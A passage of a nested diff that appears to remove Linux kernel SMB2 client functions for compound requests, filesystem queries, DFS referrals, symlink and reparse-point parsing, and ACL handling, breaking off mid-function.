+-smb2_set_next_command(struct cifs_tcon *tcon, struct smb_rqst *rqst)
+-{
+-	struct smb2_hdr *shdr;
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = ses->server;
+-	unsigned long len = smb_rqst_len(server, rqst);
+-	int i, num_padding;
+-
+-	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
+-	if (shdr == NULL) {
+-		cifs_dbg(FYI, "shdr NULL in smb2_set_next_command\n");
+-		return;
+-	}
+-
+-	/* SMB headers in a compound are 8 byte aligned. */
+-
+-	/* No padding needed */
+-	if (!(len & 7))
+-		goto finished;
+-
+-	num_padding = 8 - (len & 7);
+-	if (!smb3_encryption_required(tcon)) {
+-		/*
+-		 * If we do not have encryption then we can just add an extra
+-		 * iov for the padding.
+-		 */
+-		rqst->rq_iov[rqst->rq_nvec].iov_base = smb2_padding;
+-		rqst->rq_iov[rqst->rq_nvec].iov_len = num_padding;
+-		rqst->rq_nvec++;
+-		len += num_padding;
+-	} else {
+-		/*
+-		 * We can not add a small padding iov for the encryption case
+-		 * because the encryption framework can not handle the padding
+-		 * iovs.
+-		 * We have to flatten this into a single buffer and add
+-		 * the padding to it.
+-		 */
+-		for (i = 1; i < rqst->rq_nvec; i++) {
+-			memcpy(rqst->rq_iov[0].iov_base +
+-			       rqst->rq_iov[0].iov_len,
+-			       rqst->rq_iov[i].iov_base,
+-			       rqst->rq_iov[i].iov_len);
+-			rqst->rq_iov[0].iov_len += rqst->rq_iov[i].iov_len;
+-		}
+-		memset(rqst->rq_iov[0].iov_base + rqst->rq_iov[0].iov_len,
+-		       0, num_padding);
+-		rqst->rq_iov[0].iov_len += num_padding;
+-		len += num_padding;
+-		rqst->rq_nvec = 1;
+-	}
+-
+- finished:
+-	shdr->NextCommand = cpu_to_le32(len);
+-}
+-
+-/*
+- * Passes the query info response back to the caller on success.
+- * Caller need to free this with free_rsp_buf().
+- */
+-int
+-smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+-			 const char *path, u32 desired_access,
+-			 u32 class, u32 type, u32 output_len,
+-			 struct kvec *rsp, int *buftype,
+-			 struct cifs_sb_info *cifs_sb)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct TCP_Server_Info *server = cifs_pick_channel(ses);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec qi_iov[1];
+-	struct kvec close_iov[1];
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	int rc;
+-	__le16 *utf16_path;
+-	struct cached_fid *cfid = NULL;
+-
+-	if (!path)
+-		path = "";
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	/*
+-	 * We can only call this for things we know are directories.
+-	 */
+-	if (!strcmp(path, ""))
+-		open_cached_dir(xid, tcon, path, cifs_sb, false,
+-				&cfid); /* cfid null if open dir failed */
+-
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = desired_access,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto qic_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-	memset(&qi_iov, 0, sizeof(qi_iov));
+-	rqst[1].rq_iov = qi_iov;
+-	rqst[1].rq_nvec = 1;
+-
+-	if (cfid) {
+-		rc = SMB2_query_info_init(tcon, server,
+-					  &rqst[1],
+-					  cfid->fid.persistent_fid,
+-					  cfid->fid.volatile_fid,
+-					  class, type, 0,
+-					  output_len, 0,
+-					  NULL);
+-	} else {
+-		rc = SMB2_query_info_init(tcon, server,
+-					  &rqst[1],
+-					  COMPOUND_FID,
+-					  COMPOUND_FID,
+-					  class, type, 0,
+-					  output_len, 0,
+-					  NULL);
+-	}
+-	if (rc)
+-		goto qic_exit;
+-	if (!cfid) {
+-		smb2_set_next_command(tcon, &rqst[1]);
+-		smb2_set_related(&rqst[1]);
+-	}
+-
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto qic_exit;
+-	smb2_set_related(&rqst[2]);
+-
+-	if (cfid) {
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, 1, &rqst[1],
+-					&resp_buftype[1], &rsp_iov[1]);
+-	} else {
+-		rc = compound_send_recv(xid, ses, server,
+-					flags, 3, rqst,
+-					resp_buftype, rsp_iov);
+-	}
+-	if (rc) {
+-		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-		if (rc == -EREMCHG) {
+-			tcon->need_reconnect = true;
+-			pr_warn_once("server share %s deleted\n",
+-				     tcon->tree_name);
+-		}
+-		goto qic_exit;
+-	}
+-	*rsp = rsp_iov[1];
+-	*buftype = resp_buftype[1];
+-
+- qic_exit:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_query_info_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	if (cfid)
+-		close_cached_dir(cfid);
+-	return rc;
+-}
+-
+-static int
+-smb2_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+-	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
+-{
+-	struct smb2_query_info_rsp *rsp;
+-	struct smb2_fs_full_size_info *info = NULL;
+-	struct kvec rsp_iov = {NULL, 0};
+-	int buftype = CIFS_NO_BUFFER;
+-	int rc;
+-
+-
+-	rc = smb2_query_info_compound(xid, tcon, "",
+-				      FILE_READ_ATTRIBUTES,
+-				      FS_FULL_SIZE_INFORMATION,
+-				      SMB2_O_INFO_FILESYSTEM,
+-				      sizeof(struct smb2_fs_full_size_info),
+-				      &rsp_iov, &buftype, cifs_sb);
+-	if (rc)
+-		goto qfs_exit;
+-
+-	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
+-	buf->f_type = SMB2_SUPER_MAGIC;
+-	info = (struct smb2_fs_full_size_info *)(
+-		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
+-	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
+-			       le32_to_cpu(rsp->OutputBufferLength),
+-			       &rsp_iov,
+-			       sizeof(struct smb2_fs_full_size_info));
+-	if (!rc)
+-		smb2_copy_fs_info_to_kstatfs(info, buf);
+-
+-qfs_exit:
+-	free_rsp_buf(buftype, rsp_iov.iov_base);
+-	return rc;
+-}
+-
+-static int
+-smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
+-{
+-	int rc;
+-	__le16 srch_path = 0; /* Null - open root of share */
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-
+-	if (!tcon->posix_extensions)
+-		return smb2_queryfs(xid, tcon, cifs_sb, buf);
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = "",
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	if (rc)
+-		return rc;
+-
+-	rc = SMB311_posix_qfs_info(xid, tcon, fid.persistent_fid,
+-				   fid.volatile_fid, buf);
+-	buf->f_type = SMB2_SUPER_MAGIC;
+-	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	return rc;
+-}
+-
+-static bool
+-smb2_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
+-{
+-	return ob1->fid.persistent_fid == ob2->fid.persistent_fid &&
+-	       ob1->fid.volatile_fid == ob2->fid.volatile_fid;
+-}
+-
+-static int
+-smb2_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
+-	       __u64 length, __u32 type, int lock, int unlock, bool wait)
+-{
+-	if (unlock && !lock)
+-		type = SMB2_LOCKFLAG_UNLOCK;
+-	return SMB2_lock(xid, tlink_tcon(cfile->tlink),
+-			 cfile->fid.persistent_fid, cfile->fid.volatile_fid,
+-			 current->tgid, length, offset, type, wait);
+-}
+-
+-static void
+-smb2_get_lease_key(struct inode *inode, struct cifs_fid *fid)
+-{
+-	memcpy(fid->lease_key, CIFS_I(inode)->lease_key, SMB2_LEASE_KEY_SIZE);
+-}
+-
+-static void
+-smb2_set_lease_key(struct inode *inode, struct cifs_fid *fid)
+-{
+-	memcpy(CIFS_I(inode)->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
+-}
+-
+-static void
+-smb2_new_lease_key(struct cifs_fid *fid)
+-{
+-	generate_random_uuid(fid->lease_key);
+-}
+-
+-static int
+-smb2_get_dfs_refer(const unsigned int xid, struct cifs_ses *ses,
+-		   const char *search_name,
+-		   struct dfs_info3_param **target_nodes,
+-		   unsigned int *num_of_nodes,
+-		   const struct nls_table *nls_codepage, int remap)
+-{
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	int utf16_path_len = 0;
+-	struct cifs_tcon *tcon;
+-	struct fsctl_get_dfs_referral_req *dfs_req = NULL;
+-	struct get_dfs_referral_rsp *dfs_rsp = NULL;
+-	u32 dfs_req_size = 0, dfs_rsp_size = 0;
+-	int retry_count = 0;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, search_name);
+-
+-	/*
+-	 * Try to use the IPC tcon, otherwise just use any
+-	 */
+-	tcon = ses->tcon_ipc;
+-	if (tcon == NULL) {
+-		spin_lock(&cifs_tcp_ses_lock);
+-		tcon = list_first_entry_or_null(&ses->tcon_list,
+-						struct cifs_tcon,
+-						tcon_list);
+-		if (tcon)
+-			tcon->tc_count++;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-	}
+-
+-	if (tcon == NULL) {
+-		cifs_dbg(VFS, "session %p has no tcon available for a dfs referral request\n",
+-			 ses);
+-		rc = -ENOTCONN;
+-		goto out;
+-	}
+-
+-	utf16_path = cifs_strndup_to_utf16(search_name, PATH_MAX,
+-					   &utf16_path_len,
+-					   nls_codepage, remap);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	dfs_req_size = sizeof(*dfs_req) + utf16_path_len;
+-	dfs_req = kzalloc(dfs_req_size, GFP_KERNEL);
+-	if (!dfs_req) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	/* Highest DFS referral version understood */
+-	dfs_req->MaxReferralLevel = DFS_VERSION;
+-
+-	/* Path to resolve in an UTF-16 null-terminated string */
+-	memcpy(dfs_req->RequestFileName, utf16_path, utf16_path_len);
+-
+-	do {
+-		rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
+-				FSCTL_DFS_GET_REFERRALS,
+-				(char *)dfs_req, dfs_req_size, CIFSMaxBufSize,
+-				(char **)&dfs_rsp, &dfs_rsp_size);
+-		if (!is_retryable_error(rc))
+-			break;
+-		usleep_range(512, 2048);
+-	} while (++retry_count < 5);
+-
+-	if (rc) {
+-		if (!is_retryable_error(rc) && rc != -ENOENT && rc != -EOPNOTSUPP)
+-			cifs_tcon_dbg(VFS, "%s: ioctl error: rc=%d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-	rc = parse_dfs_referrals(dfs_rsp, dfs_rsp_size,
+-				 num_of_nodes, target_nodes,
+-				 nls_codepage, remap, search_name,
+-				 true /* is_unicode */);
+-	if (rc) {
+-		cifs_tcon_dbg(VFS, "parse error in %s rc=%d\n", __func__, rc);
+-		goto out;
+-	}
+-
+- out:
+-	if (tcon && !tcon->ipc) {
+-		/* ipc tcons are not refcounted */
+-		spin_lock(&cifs_tcp_ses_lock);
+-		tcon->tc_count--;
+-		/* tc_count can never go negative */
+-		WARN_ON(tcon->tc_count < 0);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-	}
+-	kfree(utf16_path);
+-	kfree(dfs_req);
+-	kfree(dfs_rsp);
+-	return rc;
+-}
+-
+-static int
+-parse_reparse_posix(struct reparse_posix_data *symlink_buf,
+-		      u32 plen, char **target_path,
+-		      struct cifs_sb_info *cifs_sb)
+-{
+-	unsigned int len;
+-
+-	/* See MS-FSCC 2.1.2.6 for the 'NFS' style reparse tags */
+-	len = le16_to_cpu(symlink_buf->ReparseDataLength);
+-
+-	if (le64_to_cpu(symlink_buf->InodeType) != NFS_SPECFILE_LNK) {
+-		cifs_dbg(VFS, "%lld not a supported symlink type\n",
+-			le64_to_cpu(symlink_buf->InodeType));
+-		return -EOPNOTSUPP;
+-	}
+-
+-	*target_path = cifs_strndup_from_utf16(
+-				symlink_buf->PathBuffer,
+-				len, true, cifs_sb->local_nls);
+-	if (!(*target_path))
+-		return -ENOMEM;
+-
+-	convert_delimiter(*target_path, '/');
+-	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
+-
+-	return 0;
+-}
+-
+-static int
+-parse_reparse_symlink(struct reparse_symlink_data_buffer *symlink_buf,
+-		      u32 plen, char **target_path,
+-		      struct cifs_sb_info *cifs_sb)
+-{
+-	unsigned int sub_len;
+-	unsigned int sub_offset;
+-
+-	/* We handle Symbolic Link reparse tag here. See: MS-FSCC 2.1.2.4 */
+-
+-	sub_offset = le16_to_cpu(symlink_buf->SubstituteNameOffset);
+-	sub_len = le16_to_cpu(symlink_buf->SubstituteNameLength);
+-	if (sub_offset + 20 > plen ||
+-	    sub_offset + sub_len + 20 > plen) {
+-		cifs_dbg(VFS, "srv returned malformed symlink buffer\n");
+-		return -EIO;
+-	}
+-
+-	*target_path = cifs_strndup_from_utf16(
+-				symlink_buf->PathBuffer + sub_offset,
+-				sub_len, true, cifs_sb->local_nls);
+-	if (!(*target_path))
+-		return -ENOMEM;
+-
+-	convert_delimiter(*target_path, '/');
+-	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
+-
+-	return 0;
+-}
+-
+-static int
+-parse_reparse_point(struct reparse_data_buffer *buf,
+-		    u32 plen, char **target_path,
+-		    struct cifs_sb_info *cifs_sb)
+-{
+-	if (plen < sizeof(struct reparse_data_buffer)) {
+-		cifs_dbg(VFS, "reparse buffer is too small. Must be at least 8 bytes but was %d\n",
+-			 plen);
+-		return -EIO;
+-	}
+-
+-	if (plen < le16_to_cpu(buf->ReparseDataLength) +
+-	    sizeof(struct reparse_data_buffer)) {
+-		cifs_dbg(VFS, "srv returned invalid reparse buf length: %d\n",
+-			 plen);
+-		return -EIO;
+-	}
+-
+-	/* See MS-FSCC 2.1.2 */
+-	switch (le32_to_cpu(buf->ReparseTag)) {
+-	case IO_REPARSE_TAG_NFS:
+-		return parse_reparse_posix(
+-			(struct reparse_posix_data *)buf,
+-			plen, target_path, cifs_sb);
+-	case IO_REPARSE_TAG_SYMLINK:
+-		return parse_reparse_symlink(
+-			(struct reparse_symlink_data_buffer *)buf,
+-			plen, target_path, cifs_sb);
+-	default:
+-		cifs_dbg(VFS, "srv returned unknown symlink buffer tag:0x%08x\n",
+-			 le32_to_cpu(buf->ReparseTag));
+-		return -EOPNOTSUPP;
+-	}
+-}
+-
+-static int
+-smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifs_sb_info *cifs_sb, const char *full_path,
+-		   char **target_path, bool is_reparse_point)
+-{
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct kvec err_iov = {NULL, 0};
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec close_iov[1];
+-	struct smb2_create_rsp *create_rsp;
+-	struct smb2_ioctl_rsp *ioctl_rsp;
+-	struct reparse_data_buffer *reparse_buf;
+-	int create_options = is_reparse_point ? OPEN_REPARSE_POINT : 0;
+-	u32 plen;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+-
+-	*target_path = NULL;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	/* Open */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto querty_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-
+-	/* IOCTL */
+-	memset(&io_iov, 0, sizeof(io_iov));
+-	rqst[1].rq_iov = io_iov;
+-	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-	rc = SMB2_ioctl_init(tcon, server,
+-			     &rqst[1], fid.persistent_fid,
+-			     fid.volatile_fid, FSCTL_GET_REPARSE_POINT, NULL, 0,
+-			     CIFSMaxBufSize -
+-			     MAX_SMB2_CREATE_RESPONSE_SIZE -
+-			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
+-	if (rc)
+-		goto querty_exit;
+-
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-
+-	/* Close */
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto querty_exit;
+-
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, tcon->ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-
+-	create_rsp = rsp_iov[0].iov_base;
+-	if (create_rsp && create_rsp->hdr.Status)
+-		err_iov = rsp_iov[0];
+-	ioctl_rsp = rsp_iov[1].iov_base;
+-
+-	/*
+-	 * Open was successful and we got an ioctl response.
+-	 */
+-	if ((rc == 0) && (is_reparse_point)) {
+-		/* See MS-FSCC 2.3.23 */
+-
+-		reparse_buf = (struct reparse_data_buffer *)
+-			((char *)ioctl_rsp +
+-			 le32_to_cpu(ioctl_rsp->OutputOffset));
+-		plen = le32_to_cpu(ioctl_rsp->OutputCount);
+-
+-		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
+-		    rsp_iov[1].iov_len) {
+-			cifs_tcon_dbg(VFS, "srv returned invalid ioctl len: %d\n",
+-				 plen);
+-			rc = -EIO;
+-			goto querty_exit;
+-		}
+-
+-		rc = parse_reparse_point(reparse_buf, plen, target_path,
+-					 cifs_sb);
+-		goto querty_exit;
+-	}
+-
+-	if (!rc || !err_iov.iov_base) {
+-		rc = -ENOENT;
+-		goto querty_exit;
+-	}
+-
+-	rc = smb2_parse_symlink_response(cifs_sb, &err_iov, target_path);
+-
+- querty_exit:
+-	cifs_dbg(FYI, "query symlink rc %d\n", rc);
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_ioctl_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	return rc;
+-}
+-
+-int
+-smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifs_sb_info *cifs_sb, const char *full_path,
+-		   __u32 *tag)
+-{
+-	int rc;
+-	__le16 *utf16_path = NULL;
+-	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
+-	int flags = CIFS_CP_CREATE_CLOSE_OP;
+-	struct smb_rqst rqst[3];
+-	int resp_buftype[3];
+-	struct kvec rsp_iov[3];
+-	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
+-	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
+-	struct kvec close_iov[1];
+-	struct smb2_ioctl_rsp *ioctl_rsp;
+-	struct reparse_data_buffer *reparse_buf;
+-	u32 plen;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	memset(rqst, 0, sizeof(rqst));
+-	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
+-	memset(rsp_iov, 0, sizeof(rsp_iov));
+-
+-	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
+-	if (!utf16_path)
+-		return -ENOMEM;
+-
+-	/*
+-	 * setup smb2open - TODO add optimization to call cifs_get_readable_path
+-	 * to see if there is a handle already open that we can use
+-	 */
+-	memset(&open_iov, 0, sizeof(open_iov));
+-	rqst[0].rq_iov = open_iov;
+-	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = full_path,
+-		.desired_access = FILE_READ_ATTRIBUTES,
+-		.disposition = FILE_OPEN,
+-		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open_init(tcon, server,
+-			    &rqst[0], &oplock, &oparms, utf16_path);
+-	if (rc)
+-		goto query_rp_exit;
+-	smb2_set_next_command(tcon, &rqst[0]);
+-
+-
+-	/* IOCTL */
+-	memset(&io_iov, 0, sizeof(io_iov));
+-	rqst[1].rq_iov = io_iov;
+-	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
+-
+-	rc = SMB2_ioctl_init(tcon, server,
+-			     &rqst[1], COMPOUND_FID,
+-			     COMPOUND_FID, FSCTL_GET_REPARSE_POINT, NULL, 0,
+-			     CIFSMaxBufSize -
+-			     MAX_SMB2_CREATE_RESPONSE_SIZE -
+-			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
+-	if (rc)
+-		goto query_rp_exit;
+-
+-	smb2_set_next_command(tcon, &rqst[1]);
+-	smb2_set_related(&rqst[1]);
+-
+-
+-	/* Close */
+-	memset(&close_iov, 0, sizeof(close_iov));
+-	rqst[2].rq_iov = close_iov;
+-	rqst[2].rq_nvec = 1;
+-
+-	rc = SMB2_close_init(tcon, server,
+-			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
+-	if (rc)
+-		goto query_rp_exit;
+-
+-	smb2_set_related(&rqst[2]);
+-
+-	rc = compound_send_recv(xid, tcon->ses, server,
+-				flags, 3, rqst,
+-				resp_buftype, rsp_iov);
+-
+-	ioctl_rsp = rsp_iov[1].iov_base;
+-
+-	/*
+-	 * Open was successful and we got an ioctl response.
+-	 */
+-	if (rc == 0) {
+-		/* See MS-FSCC 2.3.23 */
+-
+-		reparse_buf = (struct reparse_data_buffer *)
+-			((char *)ioctl_rsp +
+-			 le32_to_cpu(ioctl_rsp->OutputOffset));
+-		plen = le32_to_cpu(ioctl_rsp->OutputCount);
+-
+-		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
+-		    rsp_iov[1].iov_len) {
+-			cifs_tcon_dbg(FYI, "srv returned invalid ioctl len: %d\n",
+-				 plen);
+-			rc = -EIO;
+-			goto query_rp_exit;
+-		}
+-		*tag = le32_to_cpu(reparse_buf->ReparseTag);
+-	}
+-
+- query_rp_exit:
+-	kfree(utf16_path);
+-	SMB2_open_free(&rqst[0]);
+-	SMB2_ioctl_free(&rqst[1]);
+-	SMB2_close_free(&rqst[2]);
+-	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+-	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+-	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
+-	return rc;
+-}
+-
+-static struct cifs_ntsd *
+-get_smb2_acl_by_fid(struct cifs_sb_info *cifs_sb,
+-		    const struct cifs_fid *cifsfid, u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	unsigned int xid;
+-	int rc = -EOPNOTSUPP;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	xid = get_xid();
+-	cifs_dbg(FYI, "trying to get acl\n");
+-
+-	rc = SMB2_query_acl(xid, tlink_tcon(tlink), cifsfid->persistent_fid,
+-			    cifsfid->volatile_fid, (void **)&pntsd, pacllen,
+-			    info);
+-	free_xid(xid);
+-
+-	cifs_put_tlink(tlink);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-
+-}
+-
+-static struct cifs_ntsd *
+-get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+-		     const char *path, u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	unsigned int xid;
+-	int rc;
+-	struct cifs_tcon *tcon;
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	__le16 *utf16_path;
+-
+-	cifs_dbg(FYI, "get smb3 acl for path %s\n", path);
+-	if (IS_ERR(tlink))
+-		return ERR_CAST(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		free_xid(xid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.path = path,
+-		.desired_access = READ_CONTROL,
+-		.disposition = FILE_OPEN,
+-		/*
+-		 * When querying an ACL, even if the file is a symlink
+-		 * we want to open the source not the target, and so
+-		 * the protocol requires that the client specify this
+-		 * flag when opening a reparse point
+-		 */
+-		.create_options = cifs_create_options(cifs_sb, 0) |
+-				  OPEN_REPARSE_POINT,
+-		.fid = &fid,
+-	};
+-
+-	if (info & SACL_SECINFO)
+-		oparms.desired_access |= SYSTEM_SECURITY;
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+-		       NULL);
+-	kfree(utf16_path);
+-	if (!rc) {
+-		rc = SMB2_query_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
+-				    fid.volatile_fid, (void **)&pntsd, pacllen,
+-				    info);
+-		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-
+-	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
+-	if (rc)
+-		return ERR_PTR(rc);
+-	return pntsd;
+-}
+-
+-static int
+-set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+-		struct inode *inode, const char *path, int aclflag)
+-{
+-	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+-	unsigned int xid;
+-	int rc, access_flags = 0;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	__le16 *utf16_path;
+-
+-	cifs_dbg(FYI, "set smb3 acl for path %s\n", path);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
